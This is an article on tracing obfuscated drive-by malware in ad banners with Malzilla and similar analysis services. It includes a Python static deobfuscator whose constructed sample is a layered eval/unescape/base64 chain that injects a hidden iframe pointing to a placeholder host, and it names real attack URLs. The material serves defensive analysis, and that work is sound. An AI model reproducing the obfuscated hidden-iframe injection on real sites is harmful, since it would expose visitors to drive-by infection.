Tracking down malware
by Daniel Bachfeld
Criminals increasingly attempt to camouflage the traces of their malware on the internet to keep control of a hijacked server for as long as possible. However, their paths can be retraced using special tools to identify the vulnerability the malware intends to exploit to enter a system.
While, in the past, browsers only contracted viruses and trojans via dubious web pages, all that is required today is that users read the morning news on a popular news site. In the most recent incident, browser holes were exploited to install scareware in the advertising banners at German news sites Handelsblatt.de and zeit.de. For this attack, the criminals responsible concealed specially crafted JavaScript code in the banner. This loaded further code in an iFrame that, in turn, pointed to a different page where the Neosploit exploit toolkit finally checked the browser's QuickTime, Java and Adobe Reader plug-ins for various holes.
Criminals use a multi-stage approach to camouflage the true origin of an attack. Firstly, they don't embed plain text links in the web pages or Flash banners they infect, but encode URLs into long character strings which are only decoded at run-time via JavaScript or ActionScript – even the script itself is often encoded. Secondly, malware programmers use multiple detours, leading the browser to the actual malware via jumps to various other pages. All this is designed to complicate tracking and mislead users, website operators and even anti-virus specialists.
Thankfully, there are tools and helpers that can reconstruct more or less intelligible code from a JavaScript segment which is virtually undecipherable to the human eye. This allows us to take up the chase, or at least figure out which holes the attackers attempted to exploit. Tools such as Malzilla and Jode help with manual analysis, while the jsunpack and Wepawet analytical services with their automated facilities support the work of analysts. Let's take a quick look at all four.
Malzilla
The Malzilla tool for Windows helps malware hunters figure out obfuscated JavaScript segments on infected web pages. Once the URL is identified, the tool retrieves and displays the HTML code in question. The authors of viruses generally use two methods to scramble embedded links, malware URLs and other code. A simple way is to encode a URL via base64 or via the Universal Character Set (UCS). Malzilla contains a number of decoders that can unscramble such character strings and make them legible for analysts.
The other method is to use JavaScript and various data to assemble a URL at run-time. Malzilla can, however, emulate the execution of JavaScript code and display the respective results. It is not uncommon for virus authors to combine the two methods, so that several rounds in Malzilla may be required to track down the malware.
For a first test, take the URL of an infected web page and enter it into Malzilla's address field. You can find samples for your own experiments at sites such as www.malwaredomainlist.com or www.malwareurl.com. However, the URLs listed on these sites shouldn't be opened in a browser without prior protective measures. Malzilla takes various precautions to prevent the analyst's system from getting infected. For instance, it executes the code using special JavaScript libraries that are unable to impact local resources. An attacker would, therefore, have to exploit a hole in Malzilla to inject a trojan. Nevertheless, it is not advisable to use the same PC both for malware analysis and for online banking – better safe than sorry. An even more preferable approach is to run the tests in a virtual environment such as the free VirtualBox.
The "Get" button calls the entered URL, and Malzilla retrieves the destination's HTML code. This code can be examined for suspicious entries or scripts in a text window. Malzilla conveniently auto-highlights the JavaScript passages contained in the HTML code and sends them to the decoder. The respective code segments can then be viewed in the "Decoder" window, where the "Run Script" button serves for executing the code.
If a script was executed successfully, Malzilla issues the message "Script compiled" and displays the result in the bottom window. Often, this result is a hidden iFrame that was secretly opened in the normal browser window and points to another page, or a JavaScript segment which, in turn, may need to be deciphered. If there is another script, you can simply copy and paste the code from the results window to the decoder window and restart "Run Script" to execute it. If the result is a simple link such as the one shown in our picture, you can enter this URL and start the process over in Malzilla, gradually working your way towards the origin of the attack – in our example, the corresponding page is oughwa.com/in4.php. The script on this page redirects Malzilla's request to the apomith.com server, where the actual exploits are lurking.
Occasionally, Malzilla can't complete the execution of a script because it doesn't support certain JavaScript functions like document.createElement() that may be included – which is the case in the scripts embedded at apomith.com.
At this point, it is either necessary to adapt the JavaScript code and replace the unsupported JavaScript function with a similar, supported function, or to use a different tool such as jsunpack – more about this later.
Malzilla can also partially expose obfuscated code sequences without emulation, using its numerous decoder functions instead. For instance, it can automatically decode segments camouflaged via the escape function and write the result to a file. Malzilla also offers various decoding options that can be tried out manually. How and when to use these functions is demonstrated in many tutorials on the tool's project page.
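The two scrambling methods described above and the escape()-style decoding can be reproduced without Malzilla's emulator. The following Python script is an added example, not Malzilla's code or anything from this article: it applies purely static decoders (unescape()/UCS escapes, base64, String.fromCharCode plus string concatenation) round by round, the way an analyst re-feeds Malzilla's result window into its decoder, and reports the URLs and iframe targets that surface without ever executing the script. The three-layer sample and the host example.invalid are constructed for the demonstration; like any static pass, it cannot fold code that is only assembled through DOM calls such as document.createElement().

```python
import base64
import re

def decode_escapes(s):
    """Resolve unescape()-style %uXXXX/%XX and JS \\uXXXX/\\xXX escapes."""
    for pat in (r"%u([0-9a-fA-F]{4})", r"%([0-9a-fA-F]{2})",
                r"\\u([0-9a-fA-F]{4})", r"\\x([0-9a-fA-F]{2})"):
        s = re.sub(pat, lambda m: chr(int(m.group(1), 16)), s)
    return s

def decode_fromcharcode(s):
    """Fold String.fromCharCode(104,...) into a literal and join "a"+"b" literals."""
    s = re.sub(r"String\.fromCharCode\(([\d,\s]+)\)", lambda m: '"'
               + "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1))) + '"', s)
    return re.sub(r'"\s*\+\s*"', "", s)

def decode_base64(s):
    """Replace quoted base64 blobs that decode to printable text."""
    def repl(m):
        try:
            raw = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
        return raw if raw.isprintable() else m.group(0)
    return re.sub(r'["\']([A-Za-z0-9+/]{16,}={0,2})["\']', repl, s)

def peel(script, max_rounds=10):
    """Apply all decoders until nothing changes; one pass mirrors one Malzilla round."""
    rounds = 0
    while rounds < max_rounds:
        new = decode_base64(decode_fromcharcode(decode_escapes(script)))
        if new == script:
            break
        script, rounds = new, rounds + 1
    urls = sorted(set(re.findall(r"https?://[^\s\"'<>)]+", script)))
    iframes = re.findall(r"<iframe[^>]*\bsrc=[\"']?([^\"'\s>]+)", script, re.I)
    return script, rounds, urls, iframes

# Constructed sample (no real site; example.invalid is a placeholder): escape() text
# wrapping base64 wrapping a UCS-escaped hidden iframe with a fromCharCode-built host.
def _ucs(text):
    return "".join("\\u%04x" % ord(c) for c in text)
INNER = ('document.write("' + _ucs('<iframe src="http://') + '"+String.fromCharCode('
         + ",".join(str(ord(c)) for c in "example.invalid") + ')+"'
         + _ucs('/in.php" width=1 height=1></iframe>') + '")')
MIDDLE = 'eval(atob("' + base64.b64encode(INNER.encode()).decode() + '"))'
SAMPLE = 'eval(unescape("' + "".join("%%%02X" % ord(c) for c in MIDDLE) + '"))'
TEXT, ROUNDS, URLS, IFRAMES = peel(SAMPLE)
print("rounds:", ROUNDS, "urls:", URLS, "iframe src:", IFRAMES)
```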
The segments decoded at apomith.com reveal that the criminals try to infect systems with a PDF exploit as well as a Java exploit. The code shows that they particularly target the users of Internet Explorer, testing whether the Microsoft browser includes the ActiveX control for Adobe Reader and investigating the version of the installed control. To exploit a potential hole in Java, the apomith site downloads the jjj.jar Java archive to the computer and starts it there.